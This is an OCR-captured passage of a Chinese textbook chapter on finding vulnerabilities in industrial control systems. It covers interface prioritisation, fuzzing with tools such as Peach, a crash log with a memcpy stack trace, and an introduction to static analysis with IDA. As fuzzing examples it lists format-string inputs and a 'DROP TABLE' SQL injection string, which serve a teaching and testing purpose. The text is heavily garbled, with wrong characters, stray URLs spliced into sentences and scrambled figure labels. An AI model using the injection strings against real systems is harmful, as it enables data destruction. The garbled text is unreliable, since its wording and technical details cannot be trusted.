文档 中 应 当 说 明 目 标 使 用 的 所 有 第 三 方 依 赖 库 文件 。 从 某 种 程度 上 来 说 ， 测 试 人 员 也 非常 希望 阅读 一 壕 文 档 ， 但 可 能 只 是 粗略 地 浏览 一 遍 。 然 而 ， 有 时 工控 
系统 设备 与 软件 中 的 漏洞 并 非 由 软件 直接 导致 ， 而 是 由 第 三 方 库 所 造成 的 。 对 于 部 分 仍然 使 用 低 版 本 库 文件 的 工控 系统 设备 与 软件 而 言 更 是 如 此 。 虽 然 该 库 文件 
首次 使 用 时 可 能 是 当时 的 最 新 版 本 ,但 是 当 新 版 本 发 布 时 开发 人 员 并 未 对 其 升级 。 所 以 当 低 版 本 的 库 文件 中 发 现 漏洞 时 ， 所 有 使 用 该 库 文件 的 软件 束 都 存在 漏 
洞 。 


如 果 研 究 目标 是 物理 设备 ， 那 么 对 目标 设备 物理 层面 的 检查 则 可 以 获取 到 更 多 信息 。 这 些 信息 包括 主板 上 搭载 的 心 片 类 型 、 所 使 用 的 处 理 器 型 号 (该 信息 在 
步骤 4， 也 融 是 分 析 步 又 中 非常 重要 ) ， 以 及 连接 到 外 部 设备 的 物理 端口 。 例 如 ， 部 分 主板 并 未 在 文档 中 记载 对 JTAG 针 脚 的 定义 。 所 以 ， 需 要 拆 开设 备 看 一 看 ， 
万 一 能 找到 些 广 商 在 文档 中 “和 志 记 ” 提 到 的 信息 呢 。 


7A WR: 可 访问 接口 的 枚 举 己 优先 级 排序 


作为 大 型 系统 的 组 成 部 分 ， 任 何 软件 或 硬件 至 少 会 采用 一 种 方式 进行 信息 的 输入 或 输出 ， 这 融 是 目标 系统 的 接口 。 接 口 可 以 采用 任意 方式 同 目标 系统 进行 信 
息 交 互 。 这 些 方式 可 以 包括 TCP 套 接 字 、 键 盘 输 入 、 文 件 系统 、USB 设 备 、 传 感 器 ， 等 等 。 接 口 信息 通常 会 记载 在 文档 中 ， 但 也 并 不 总 是 这 样 。 在 分 析 步 骤 中 也 
会 友 现 部 分 接口 ; 此 时 ， 结 合 新 获取 到 的 信息 ， 在 分 析 步 骤 中 会 再 次 对 此 进行 简要 分 析 。 


枚 举 得 到 所 有 接口 之 后 ， 需 要 对 它们 进行 优先 级 排序 。 对 于 大 多 数 项 目 而 言 ， 安 全 研究 项 目 通 常 都 有 截止 期 限 ， 所 以 需要 基于 各 种 因素 对 接口 进行 优先 级 排 
序 。 如 果 目 标 是 PLC， 那 么 就 好 像 放 在 军事 掩体 地 下 室 的 加 固 保 险 箱 中 一 样 。 在 这 种 情况 下 ， 依 赖 于 攻击 者 将 USB 驱 动 器 插入 目标 设备 的 漏洞 挖 握 方式 似乎 不 是 那 


么 重要 。 但 是 ， 如 果 同 一 块 PLC 需 要 向 工业 实时 历史 数据 库 提 人 交 数 据 ， 需 要 经 过 多 个 网 络 跃 点 (hop) 才能 到 达 该 数据 库 ， 那 么 攻击 者 就 能 够 从 网 络 连接 链 路 中 的 
任意 一 点 实现 对 PLC 的 访问 ， 因 此 保护 网 络 端口 安全 就 具有 更 高 的 优先 级 。 通 常 ， 接 口 是 根 据 访问 的 难 易 程 度 及 在 该 接口 所 挖掘 出 漏洞 的 潜在 影响 进行 优先 级 排 
序 的 。 接 口 越 容易 访问 ， 在 该 接口 中 挖掘 出 的 漏洞 影响 融 越 高 ， 那 么 该 接口 的 风险 也 融 越 大 。 


7.5 DRA: 逐 接 口 分 析 与 测试 


终于 到 干货 了 。 这 惑 是 大 多 数 人 认为 的 “入 侵 ” 步 又。 在 这 里 我 们 将 展开 对 所 有 相关 工具 和 知识 的 介绍 ， 讲 述 在 “0-day” 漏 洞 挖掘 过 程 中 如 何 开展 研究 。 该 
步骤 实际 包括 多 个 独立 的 子 步骤 ， 根 据 研究 团队 的 规模 及 分 析 工 具 的 自动 化 程度 ， 也 可 以 对 这 些 子 步骤 并 行 地 开展 研究 。 其 中 每 个 子 步骤 又 可 以 进一步 分 解 为 专 
业 化 程度 更 高 的 研究 领域 ， 有 些 非 常 聪明 的 研究 人 员 在 其 中 部 分 领域 已 经 取得 了 一 些 非 常 棒 的 研究 成 果 。 本 章 中 ， 我 们 主要 从 较 高 层次 上 对 划分 出 的 各 个 领域 进 
行 介绍 ， 对 于 专业 化 程度 较 高 的 领域 则 留 给 读者 自己 做 进一步 深入 的 研究 。 


本 章 所 涵盖 的 三 个 领域 分 别 是 
` 模糊 测试 (Fuzzing) 


` 静态 二 进 制 分 析 


7.5.1 ”模糊 测试 


模糊 测试 (Fuzzing) 或 称 之 为 fuzz testing 是 向 接口 输出 大 量 半 随 机 数据 的 一 种 测试 方法 (https://en.wikipedia.org/wiki/Fuzz_testing) 。 模 糊 测试 通常 
是 一 个 高 度 自 动 化 的 过 程 ， 能 够 对 成 干 上 万 种 不 同 的 输入 进行 测试 。 输 入 数据 可 以 是 完全 随机 的 ， 并 且 仍 然 被 看 作 是 模糊 测试 ， 但 是 完全 随机 的 数据 所 带 来 的 问 
题 是 往往 会 在 第 一 次 代码 验证 检查 时 就 卡 住 。 例 如 ， 如 果 进 行 模糊 测试 的 数据 字段 以 整 型 数据 为 输入 ， 但 是 存在 代码 检查 步 又 来 确保 输入 的 数据 确实 是 整 型 数 
据 ， 那 么 采用 任意 ASCll 字 符 对 该 字段 进行 随机 模糊 测试 就 很 可 能 导致 检查 失败 ， 从 而 难以 对 代码 的 其 他 部 分 进行 测试 。 评 价 一 次 模糊 测试 是 否 出 色 的 度量 标准 是 
代码 覆盖 率 。 部 分 代码 段 只 有 在 触发 多 个 条 件 之 后 才 会 运行 ， 因 此 只 有 在 大 部 分 数据 是 正确 的 情况 下 才能 够 接触 到 深层 次 的 代码 段 。 


1. 模 糊 测试 工具 的 类 型 


模糊 测试 工具 (Fuzzer) 主要 以 两 种 方式 生成 测试 数据 (如 果 把 随机 数据 也 算 在 内 的 话 束 是 三 种 ) 。 第 一 种 方式 是 基于 变异 的 模糊 测试 (mutation-based 
fuzzing) 。 该 方法 接收 符合 规范 的 输入 数据 ， 然 后 通过 随机 比特 位 翻转 来 对 数据 进行 变异 。 这 样 做 的 优点 是 数据 中 大 多 数 比特 位 都 是 正确 的 ， 从 而 能 够 得 到 较 高 
的 代码 覆盖 率 。 除 此 之 外 ， 其 优点 还 在 于 测试 人 员 不 需要 知道 数据 原来 的 格式 或 者 顺序 ， 测 试 中 只 需要 接收 比特 位 ， 继 而 改变 其 中 的 部 分 比特 ， 然 后 向 目标 设备 
输出 得 到 的 结果 就 可 以 了 。 一 些 基于 变异 的 模糊 测试 工具 除了 进行 比特 位 翻转 ， 还 会 以 随机 交换 数据 块 的 方式 进行 数据 变异 。 


基于 变异 的 模糊 测试 的 缺点 在 于 ， 其 往往 会 错过 部 分 以 常见 字符 串 为 测试 数据 就 可 以 立即 找到 的 漏洞 。 以 格式 化 字符 串 漏洞 为 例 。 通 常 可 以 通过 输 
入 %x%xhttp://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16575/OEBPS/Text/... 或 
4 %n%nhttp://www.hzcourse.com/resource/readBook?path=/openresources/teach_ebook/uncompressed/16575/OEBPS/Text/... FERREIRA 
字符 串 漏洞 。 但 是 ， 通 过 对 符合 规范 的 数据 进行 随机 比特 变换 得 到 上 述 字符 串 的 概率 非常 小 。 因 此 ， 基 于 变异 的 模糊 测试 最 适合 挖掘 由 于 输入 数据 超出 预期 学 
围 ， 或 者 由 未 知 类 型 输入 数据 所 导致 的 漏洞 ， 但 该 方法 难以 生成 更 加 复杂 的 测试 用 例 ， 这 融 是 为 什么 会 出 现 第 二 种 类 型 的 模糊 测试 工具 的 原因 。 

基于 生成 的 模糊 测试 工具 (Generation-based fuzzers) 是 为 了 解决 基于 变异 的 模糊 测试 工具 的 缺点 而 提出 的 。 基 于 生成 的 模糊 测试 工具 需要 了 解数 据 的 格 
式 ， 而 这 需要 耗费 一 点 时 间 。 借 助 获取 的 数据 格式 信息 ， 可 以 用 特定 数据 类 型 的 处 理 方式 对 数据 字段 进行 操作 ， 使 数据 字段 中 包含 可 能 导致 软件 出 问题 的 数值 。 
如 果 数 据 字 段 包含 字符 串 类 型 的 值 ， 则 可 以 选择 格式 化 字符 串 来 测试 字符 串 类 型 的 漏洞 。 或 者 可 以 将 字符 串 Robert”) ; DROP TABLE Students; - 
- (https://xkcd.com/327/) 局] 插 入 到 所 有 字符 串 字段 中 ， 用 以 测试 未 对 输入 数据 进行 过 滤 的 SQL 查询 语句 中 是 否 使 用 了 这 些 字 段 。 还 有 很 多 类 似 的 测试 方法 ， 
FELLA Fk, 

基于 生成 的 模糊 测试 的 缺点 是 ， 首 先 要 有 一 套 相 当 规 模 的 已 若 “ 坏 ”数据 集合 。 (如 果 说 测试 人 员 的 目标 就 是 要 突破 某 些 限制 ， 那 么 这 些 “ 坏 ”数据 可 能 就 
是 非常 好 的 数据 字符 串 ! ) 


2. 模 糊 测试 工具 的 考量 


乎 运 的 是 ， 已 经 有 部 分 高 级 模糊 测试 工具 考虑 到 了 这 一 点 。 昌 然 不 是 所 有 的 模糊 测试 工具 都 是 一 样 的 ， 但 是 ， 没 有 一 款 模 糊 测 试 工具 能 够 适用 于 所 有 的 测试 
场景 。 有 些 模糊 测试 工具 只 能 处 理 某 一 种 类 型 的 目标 ， 例 如 文件 格式 模糊 测 坛 。 有 些 模糊 测试 工具 则 仅 专 门 针 对 某 个 应 用 程序 。 正 如 计算 机 世界 中 的 其 他 事情 一 
样 ， 模 糊 测试 的 开展 过 程 中 也 存在 权衡 取舍 。 


首先 是 金钱 与 时 间 的 权衡 。 可 以 免费 获取 的 模糊 测试 工具 包括 Powerfuzzer (http://www.powerfuzzer.com/) 和 Peach 的 社区 版 


(http://www.peachfuzzer.com/) 。 商 业 版 的 模糊 测试 工具 价格 范围 区 | 间 则 从 1000 美 元 (每年) 到 超过 100000 美 元 (每 年 ) 。 如 你 所 料 ， 售 价 高 昂 的 模糊 测 
试 工具 通常 还 包括 后 续 的 支持 维护 、 并 能 够 针对 测试 任务 进行 定制 开 友 。 丙 业 版 的 模糊 测试 程序 还 能 够 提供 对 多 种 协议 的 支持 。 在 商业 版 模糊 测试 程序 中 做 得 比 
较 好 的 几 款 工具 包括 Aegis Fuzzer (https://www.automatak.com/) 和 Defensics (http://www.codenomicon.com/products/defensics/) 。 可 是 ， 商 业 版 
模糊 测试 工具 中 往往 并 未 包含 工控 系统 协议 。 不 过 随 着 工控 系统 和 SCADA 安 全 问题 的 不 断 涌现 ， 已 经 有 部 分 公司 选择 将 SCADA 协 议 添加 到 了 它们 的 测试 套件 之 
中 。 因 此 ， 在 投入 资金 购买 模糊 测试 解决 方案 之 前 ， 首 先 要 确保 该 方案 确实 能 够 解决 自身 的 问题 。 


由 于 添加 原 测 试 程序 尚未 包含 的 功能 需要 开 友 时 间 ， 因 此 权衡 过 程 中 的 “时 间 ” 消 耗 主要 来 源 于 此 ， 内 容 通 冲 包 括 协 议 格 式 分 析 和 辅助 工具 实现 (这 部 分 内 
容 将 在 下 文 讨论 ) 。 也 许 用 户 已 经 找到 了 一 款 易 于 设置 和 使 用 的 模糊 测试 工具 ， 但 该 工具 尚未 提供 对 DNP3 协 议 的 文 持 。 那 么 ， 这 时 融 需 要 学 习 如 何 将 对 DNP3 协 
议 进 行 模 糊 测试 的 功能 添加 到 模糊 测试 工具 当中 ， 所 以 要 么 为 前 面 提 到 的 商业 版 模糊 测试 工具 所 提供 的 服务 文 付费 用 ， 要 么 为 有 经 验 的 工程 师 文 付 加 班 费 。 


其 他 需要 考虑 的 内 容 还 包括 功能 和 易 用 性 。 部 分 模糊 测试 工具 只 要 使 用 鼠标 束 能 操作 ， 但 其 功能 也 很 有 限 。 而 其 他 的 模糊 测试 工具 则 可 能 需要 经 历 几 长 的 安 
六 过 程 ， 但 可 以 对 从 昌 面 应 用 程序 到 网 络 伺服 控制 器 的 几乎 所 有 对 象 进行 模糊 测试 。 如 果 想 在 模糊 测试 过 程 中 迅速 取得 进展 ， 可 以 使 用 一 款 简 单 的 模糊 测试 工具 
快速 获得 部 分 结果 ， 与 此 同时 ， 其 他 团队 成 员 则 可 以 使 用 一 款 功能 更 加 强大 的 模糊 测试 工具 来 开展 更 深入 的 测试 (假设 时 间 和 资源 允许 的 情况 下 ) 。 


A 
4 
= Na ae 
à 注意 


对 于 专业 安全 测试 所 必须 有 具备 的 特性 之 一 就 是 崩 演 的 可 复 现 性 。 当 彻夜 开展 模糊 测试 时 ， 假设 已 经 进行 了 50000+ 次 的 测试 ， 并 造成 了 17 次 崩 演 。 那 么 每 次 崩 
溃 都 是 由 哪些 输入 导致 的 呢 ? 前 渍 前 后 ， 目 标的 状态 又 是 怎样 的 呢 ? 这 些 问题 都 需要 在 模糊 测试 的 结果 发 挥 作用 之 前 予以 回答 。 重 要 的 是 ， 记 住 模糊 测试 只 能 指 
出 存在 错误 的 代码 ; 而 不 会 告诉 我 们 这 些 代 码 为 什么 会 导致 崩 演 。 为 此 ,我们 需要 对 目标 的 行为 和 代码 进行 分 析 。 


3. 模 糊 测试 工具 的 设置 


所 有 的 这 些 听 起 来 都 非常 棒 ， 但 是 模糊 测试 工具 如 何 “ 发 送 不 好 的 数据 ”， 并 且 检 测 出 这 些 数据 是 否 导致 了 前 演 呢 ? 模糊 测试 工具 如 何 hook 目 标 取决 于 目标 
的 类 型 以 及 模糊 测试 的 内 容 。 以 针对 文件 格式 的 模糊 测试 为 例 ， 这 是 一 种 比较 简单 的 模糊 测试 类 型 。 模 糊 测试 工具 的 任务 被 设置 为 执行 以 数据 文件 为 输入 的 特定 
二 进 制 程序 ， 并 且 模 糊 测 试 工具 的 输出 也 是 该 种 类 型 的 数据 文件 。 在 这 种 情况 下 ， 模 糊 测试 工具 直接 hook 到 被 测 二 进 制 程序 ， 或 者 通过 单独 的 监控 代理 程序 来 检 
测 衣 溃 ， 观 察 程序 的 异常 行为 。 从 本 质 上 来 说 ， 模 糊 测试 工具 的 监控 部 分 融 是 一 个 没有 用 户 界面 的 调试 器 。 它 可 以 查看 从 gdb ( 即 GNU DeBugger， 如 果 喜 欢 直 
接 在 命令 行 界面 调试 二 进 制 文件 ， 那 么 gdb 非 常 合适 ) 、Visual Studio 调 试 器 或 其 他 调试 器 提取 到 的 所 有 信息 。 如 图 7-1 所 示 ， 监 控 代 理 程序 对 目标 程序 异常 和 来 
目 操 作 系 统 指 示 程 序 已 崩溃 的 信号 进行 监控 。 然 后 ， 监 控 代 理 程序 可 以 获取 堆栈 跟 路 信息 和 内 存 转 储 信息 ， 并 将 其 与 当 次 测试 所 使 用 的 输入 建立 关联 。 然 后 清理 
目标 程序 ， 开 始 下 一 次 测试 。 监 控 代 理 程 序 还 需要 确保 目标 程序 在 继续 下 一 次 测试 之 前 已 处 于 就 绪 状 态 ， 而 监控 代理 程序 执行 监控 操作 的 方式 则 取决 于 目标 的 类 
型 (本 地 应 用 程序 、 远 程 应 用 程序 、 内 入 式 设 备 等 ) 。 


当 在 非 测 试 目标 的 计算 机 上 生成 数据 时 ， 测 试 过 程 会 变 得 复杂 一 些 ， 尤 其 当 模 糊 测试 的 对 象 是 网 络 协 议 时 ， 这 种 情况 更 可 能 出 现 。 在 这 种 情况 下 ， 模 糊 测 试 
工具 主 程序 需要 通过 冲 外 信道 同 监控 代理 程序 进行 通信 ， 实 现 衣 溃 跟踪 、 数 据 收集 和 目标 重 局 等 工作 。 


测试 用 例 〈 市 标识 和 从 ) 


模糊 测试 工具 


测试 目标 
{ 人 
一 监控 代理 程序 对 测试 目标 
的 内 存 、 寄 和 存 硕 以 及 网 络 
病 口 等 对 和 象 进行 监控 。 


测试 用 例 生 成 器 


监控 代理 程序 回 送 
到 模糊 测试 工具 加 
以 存储 的 测试 结果 。 
用 于 控制 测试 目标 
的 市 外 信道 〈 毅 湿 
后 重 置 、 设 置 起 始 
状态 等 ) 


监控 代理 程序 还 提供 异 篆 
处 理 程 序 ， 如 果 测 试 目 标 
朋 沉 则 进行 接管 。 


监控 代理 程序 对 来 自 模糊 
测试 工具 的 命令 CER, 
状态 验证 等 ) 进行 转发 。 
监测 代理 


图 7-1 模糊 测试 工具 架构 


由 于 控制 器 和 传感器 的 广泛 使 用 ， 所 以 嵌入 式 设备 在 工控 系统 中 非常 常见 ， 而 如 果 需 要 对 嵌入 式 设备 进行 模糊 测试 ， 那 么 设置 将 会 更 加 复杂 。 当 设备 没有 供 
监控 代理 程序 与 模糊 测试 程序 通信 的 以 太 网 端口 和 (或 ) 网 络 服务 时 ， 经 常会 导致 一 系列 问题 。 而 由 于 工控 系统 设备 通常 使 用 串 行 端 口 进行 通信 ， 所 以 这 种 情况 
在 工控 系统 设备 中 是 很 常见 的 。 为 了 跨越 这 一 障碍 ， 需 要 用 到 额外 的 硬件 以 及 某 些 定制 开发 的 软件 。 理 想 情况 下 ， 所 使 用 的 模糊 测试 工具 应 该 允许 对 其 进行 定制 
开发 。 其 中 一 个 优秀 、 可 扩展 的 模糊 测试 工具 就 是 Peach (http://www.peachfuzzer.com/) 。 通 过 将 串 行 外 设 接 口 (Serial-Peripheral Interface, SPI) 、 内 
置 集成 电路 (Inter-Integrated Circuit, 12C) 、 红 外 控制 器 (InfraRed, IR) ， 以 及 其 他 运行 定制 代码 的 设备 找 入 监控 代理 ， 就 可 以 使 用 现 有 模糊 测试 框架 的 功 
能 ， 从 而 能 够 实现 对 只 使 用 串 行 控制 端口 的 设备 进行 监控 ， 比 如 PLC。 此 外 ， 还 需要 编写 检测 错误 状态 的 代码 ， 错 误 状 态 可 以 通过 syslog 日 志 中 的 错误 信息 或 状态 
指示 灯 的 形式 出 现 。 对 于 状态 指示 灯 ， 有 人 使 用 连接 到 树 莓 派 (Raspberry Pi) 设备 的 光电 管 检 测 错误 状态 的 变化 ， 然 后 触发 监控 代理 程序 。 有 时 甚至 还 会 遇 到 
唯一 可 检测 到 的 输出 只 能 在 屏幕 上 显示 的 情况 。 对 此 ， 研 究 人 员 将 网 络 摄像 机 对 着 屏幕 ， 使 用 光学 字符 识别 (Optical Character Recognition, OCR) 软件 自动 
读 取 数值 ， 检 测 数值 何 时 超出 正常 范围 从 而 实现 对 错误 状态 的 检测 (https://www.youtube.com/watch?v=PhIin74jcYUM) 。 


我 们 在 此 不 可 能 列 出 所 有 可 能 的 配置 。 用 户 需 要 根据 具体 情况 逐个 对 目标 进行 评估 。 有 时 候 通 过 一 个 简单 的 网 络 服 务 就 可 以 实现 对 设备 的 监控 。 而 其 他 时 
候 ， 则 可 能 需要 将 一 个 咱 AG 器 件 安 六 到 电路 板 之 上 ， 深 入 到 硬件 级 别 才 能 够 实现 对 设备 的 监控 。 


4. 模 糊 测试 工具 的 结 


在 对 目标 进行 了 一 个 星期 的 暴 击 之 后 ， 在 结果 文件 夹 中 会 看 到 一 堆 衣 省 信息 。 那 么 然后 该 怎么 办 呢 ” 现 在 ， 需 要 做 的 是 逐条 阅读 崩溃 信息 ， 并 确定 哪些 崩溃 
信息 是 唯一 的 。 很 多 时 候 ， 会 看 到 发 生 在 不 同 内 存 地 址 的 崩 演 信息 ， 但 通过 分 析 堆 栈 跟踪 信息 ,会 发 现 它们 可 能 都 是 由 一 个 共同 的 肖 数 所 导致 的 ， 这 可 能 就 是 罪 
魁 祸首 。 一 旦 识别 出 唯一 的 衣 演 信息， 那么 该 信息 可 以 用 于 指导 静态 二 进 制 分 析 和 动态 二 进 制 分 析 。 知 道 哪些 输入 在 哪些 内 存 地 址 造成 了 程序 的 骨 演 有 助 于 大 大 
加 快 漏洞 挖掘 ， 这 就是 为 什么 在 所 有 漏洞 研究 计划 中 模糊 测试 都 是 其 中 的 重要 组 成 部 分 。 


下 面 是 针对 一 款 流行 软件 开展 的 模糊 测试 实例 ， 访 软件 的 功能 主要 是 对 控制 器 、 人 机 界面 控制 面板 以 及 其 他 的 一 些 东 西 进行 配置 。 测 试 工具 选择 Peach Fuzz 
Bang， 这 是 一 款 源 自 Peach 社 区 版 的 文件 模糊 测试 工具 。 首 先 ， 使 用 程序 保存 空 配置 文件 作为 测试 开始 的 模板 文件 。 测 试 过 程 进行 了 2500 次 迭代 ， 如 图 7-2 所 
示 ， 人 在 一 台 旧 笔记 本 电脑 上 运行 花费 了 好 几 个 小 时 。 在 专业 测试 环境 中 ， 进 行 约 25000 次 迭代 的 效果 可 能 会 更 好 。 但 即使 迭代 次 数 比 较 少 ， 也 还 是 友 现 了 几 个 漏 
El. 


由 于 该 版 本 的 程序 是 软件 厂商 网 站 上 当前 发 布 的 最 新 版 本 ， 所 以 被 测 程序 的 标识 信息 已 被 删除 。 


©) Peach 3 - Fuzz Bang wi = y 
introduction General Debugger GUI Output About 
图 
(64,2500, 2] Performing iteration 
165.2500.7] Performing iteration 
[66,2500,?] Performing iteration 
(67.2500. 7] Performing iteration 
(68,2500, ?] Performing iteration 
(69.2500, 7] Performing iteration 
[70,2500,3] Performing iteration 
m .2500,?] Performing iteration 
[72,2500,?] Performing iteration 
(73,2500, 7] Performing iteration 
[74,2500,?] Performing iteration 


terabon Court fat Cot: [0 


图 7-2 Peach Fuzz Bang 中 显示 的 迭代 信息 
图 7-3 中 所 示 的 每 个 目录 中 都 包含 初始 状态 的 二 进 制 文件 副本 、 导 致 肌 省 的 输入 文件 副本 、 遇 到 的 错误 信息 摘 述 以 及 堆 枝 跟踪 信息 。 下 面 是 堆栈 跟踪 信息 的 部 
分 摘录 : 
eax=0030f264 ebx=00000000 ecx=3fffec99 edx=00000002 es1i=00313ffe edi=02cc3538 
e1p=72791led7 esp=0030efac ebp=0030efb4 iopl=0 nv up ei pl nz na po ne 


es=0023 ss=002b ds=002b es=002b fs=0053 gs=002b ef1=00210202 
MSVCR1LOO!memcpy+0x57: 


> ThisPC > Downloads > peach-3.1.124-win-x64-release > Logs > PeachFuzzBang_20150914190833 > Faults > 


PROBABLY_EXPLOITABLE_0x2b2a637d_0x0b5a7566 
PROBABLY_EXPLOITABLE_0x2b2a637d_0x4c5c1/62 


PROBABLY_EXPLOITABLE_0x49346e71_0x630d3916 
PROBABLY_EXPLOITABLE_0x52267a/f_0x5777391b 
UNKNOWN_0x2a745f41_0x105e1864 


图 7-3 Peach Fuzz Bang 的 报错 信息 


72791led7 £3a5 rep movs dword ptr es: [edi] ,dword ptr [esi] 
rF 
fpcw=027F: rn 53 puozdi fpsw=4020: top=0 cc=1000 --p----- fptw=0000 


fopcode=0000 


fpip=0023:74c891b9 


st0O=-1.#SNAN0000000000000000e+0000 
st2=-1.#SNAN0000000000000000e+0000 


st4= 
st6= 


MSVCR100!memcpy+0x57: 


1.000000000000000000000eE+0000 
6.250000000000000000000e-0002 


fpdp=002b: 74bfa0cs 


stl=-1.#SNAN0000000000000000e+0000 


st3= 


0.000000000000000000000e+0000 


st5=-1.#SNAN0000000000000000e+0000 


sti/= 


6.250000000000000000000e-0002 


72791ed7 f£3a5 rep movs dword ptr es: [edi],dword ptr [esi] 

rX 

xmm0=0 0 0 0 

xmml=0 0 0 0 

xmm2=0 0 0 0 

xmm3=0 0 0 0 

xmm4=0 0 0 0 

xmm5=0 0 0 0 

xmm6=-9.8416e+036 -1.38814e-034 9.1145e+032 -0.0682103 

xmm7=9.25572e-041 1.56368e-036 4.12387e-034 1.08665e-031 

MSVCR100!memcpy+0x57: 

72791ed7 £3a5 rep movs dword ptr es: [edi] ,dword ptr [esi] 

kb 

ChildEBP RetAddr Args to Child 

0030efb4 70e40087 O02cbe7a0 0030f266 fffffffe MSVCR100!memcpy+0x57 

WARNING: Stack unwind information not available. Following frames may be wrong. 
0030efc8 70e3dd57 O2cbe7a0 0030f266 ffffffff *redacted* ! wmemcpy+0x17 

0030efe8 6c3a404d 0030f266 ffffffff 70e3f5f0 *redacted* !CString: :QuickInit+0x47 
0030£024 6c3a4800 O0030£f25c 0030f25c 02dfc520 *redacted* !CTreeFile: :ReadLine+0x15d 
0030f03c 6c3a52be 02dfc520 6c39c0f7 02df2af0 *redacted*!CTreeFile: :SkipObject+0x60 
0030£054 6c3986cd 0030f25c 119df42e O2cd3eb0 *redacted*!CTreeFile: :GetName+0xle 
0030f090 6c39b536 00000002 119df46a 0030f25c *redacted*!CItemIndexList: :Load+0x17d 
0030f0d4 6c39c10d 0030f25c 00el6acc O02ce9200 *redacted* !CMetaItem: :LoadProp+0x1d6 
0030foec 6c39b4fe 0030f25c 119d£58e 0030f25c *redacted* !CMetalItem: :Load+0x3d 
0030£130 6c39c10d 0030f25c O00e0al6c 02df2628 *redacted* !CMetaItem: :LoadProp+0x19e 
0030£148 6c39b4fe O0030f25c 119df£532 02c8a0fc *redacted* !CMetalItem: :Load+0x3d 
0030f18c 5£32a459 0030f25c 02c8a0fc 7Oe3cd00 *redacted* !CMetalItem: :LoadProp+0x19e 
0030flac 6c394038 0030f25c 119df6be 7OdfdedO *redacted*!CUISystem: :Load+0x79 
0030f200 6¢c395e27 O2cd3bfO 70e4f3a8 119df222 *redacted* !CDatabase: :Load+0x258 
0030f69c 6c3968f6 00db294c 70e4f3a8 00000000 *redacted* !CDatabase: :LoadFile+0x107 


正如 目录 名 所 指示 的 那样 ， 测 试 结果 并 不 能 保证 该 漏洞 的 可 利用 性 。 但 是 ， 针 对 mem-cpy () 函数 的 调用 确实 导致 了 缓冲 区 溢出 ， 这 是 一 个 臭名 昭著 的 危险 
函数 ， 而 缓冲 区 溢出 正 是 程序 报错 的 原因 ， 因 此 程序 中 的 这 一 漏洞 可 能 导致 严重 的 后 果 。 


7.5.2 ”静态 二 进 制 分 析 


顾名思义 ， 静 态 二 进 制 分 析 (static binary analysis) 指 在 不 实际 运行 二 进 制 代码 的 情况 下 ， 只 是 通过 查看 目标 可 执行 代码 而 进行 的 分 析 。 现 代 二 进 制程 序 中 
包含 大 量 代码 ， 但 并 不 是 说 所 有 的 代码 都 与 安全 相关 。 谁 也 不 想 化 费 一 整 天 的 时 间 来 研究 某 段 汇编 语言 函数 的 作用 ， 结 果 却 发 现 其 仅仅 是 鼠标 单 击 事件 的 处 理 程 
序 。 当 获取 到 大 量 信 息 时 ,信息 的 组 织 方 式 对 于 信息 的 有 效 利用 至 天 重要 ， 由 于 已 经 有 合适 的 工具 用 于 该 分 析 ， 所 以 首先 对 这 些 工具 进行 初步 的 了 解 。 


1. 静 态 二 进 制 分 析 工 具 


虽然 可 能 存在 部 分 静态 二 进 制 分 析 工 具 适 用 于 大 多 数 分 析 场 景 的 情况 ， 但 并 不 是 所 有 工具 都 适合 于 每 种 分 析 场 景 的 。 为 了 针对 分 析 工 作 选 择 出 合适 的 工具 ， 
牢记 二 进 制 文件 的 创建 方式 非常 重要 。 一 组 开 友 人 员 编 写 了 一 堆 源 代码 ， 然 后 对 其 进行 编译 ， 使 其 能 够 运行 于 特定 处 理 器 架构 上 的 特定 操作 系统 之 中 。 虽 然 在 大 
多 数 情 况 下 拥有 源 代 码 能 够 简化 分 析 工 作 ， 但 是 源 代码 通常 是 难以 获取 的 。 所 以 ,我们 只 能 对 单个 二 进 制 文件 或 者 一 组 二 进 制 文件 展开 分 析 。 而 如 果 我 们 可 以 将 
二 进 制 代码 反 编 译 为 源 代码 的 话 融 太 棒 了 ， 但 通常 这 条 路 也 走 不 通 。 不 过 ， 借 助 一 些 令 人 印象 深刻 的 工具 能 够 得 到 最 接近 于 源 代 码 的 反 编 译 结果 ， 我 们 在 这 里 也 


会 提 到 这 些 工 具 。 


第 一 个 ， 也 可 以 说 是 最 重要 的 工具 就 是 区 汇编 器 ， 这 也 是 任何 从 事 静 态 二 进 制 分 析 工 作 的 分 析 人 员 都 应 该 具备 的 工具 。 二 进 制 文件 必须 能 够 在 特定 处 理 器 上 
运行 ， 这 就 意味 着 二 进 制 文件 都 是 由 以 汇编 语言 表示 的 处 理 器 指令 构成 的 。 在 当前 阶段 ， 我 们 已 经 知道 了 人 处理 器 的 架构 (这些 内 容 可 以 在 步骤 2， 也 就 是 通过 阅读 
文档 获取 到 ) 。 反 汇编 器 能 够 读 取 二 进 制 文件 的 内 容 (机 器 代码 ) ， 然 后 将 其 转换 为 指定 架构 下 的 汇编 语言 。IDA Pro (http://www.hex- 
rays.com/products/ida/index.shtml) 是 最 好 用 的 反 汇编 器 之 一 。1DA 能 够 反 汇 编 60 多 种 不 同系 列 处 理 器 上 的 汇编 代码 ， 包 括 x86、x64、ARM、MIPS、SPARC 
等 。 通 常情 况 下 ，1DA 会 自动 检测 二 进 制 文件 所 针对 的 处 理 器 架构 。 但 有 些 时 候 ， 则 需要 给 它 一 些 指 导 。 我 有 一 次 就 遇 到 了 一 个 基于 ARMv7 架 构 下 Thumb 指 令 集 
开发 的 二 进 制 文件 ， 但 工具 只 识别 出 其 是 ARMV7 架 构 下 的 文件 。 再 提 一 下 ， 这 些 信息 都 应 该 在 本 步骤 中 获取 。 


IDA 功 能 强大 ， 足 够 用 一 本 书 来 对 它 进 行 介 绍 。 (事实 上 ， 也 确实 有 这 样 一 本 书 。Chris Eagle 编写 的 《The IDA Pro Book: The Unofficial Guide to the 
World’ s Most Popular Disasse-mbler) (I) 。 既 然 如 此 ， 我 们 只 对 IDA 用 于 静态 二 进 制 分 析 的 一 些 主要 功能 进行 介绍 。 在 不 进行 任何 组 织 的 情况 下 ， 二 进 制 文 
件 的 反 汇 编 只 是 一 个 由 机 器 指令 组 成 的 平面 文件 (flat file) 。 大 多 数 反 汇编 器 至 少 会 将 文件 分 解 为 由 文件 首部 (例如 COFF 和 PE) 指示 的 单独 的 内 存 区 段 ， 而 
1DA 则 不 止 于 此 。1IDA 可 以 将 反 汇 编 文 件 组 织 为 由 相关 基本 块 组 成 的 流 图 ， 如 图 7-4 所 示 。 


ig IDA View-A x | Hex View-1 ‘Al Structures 
i ~ |loc Pelee l 


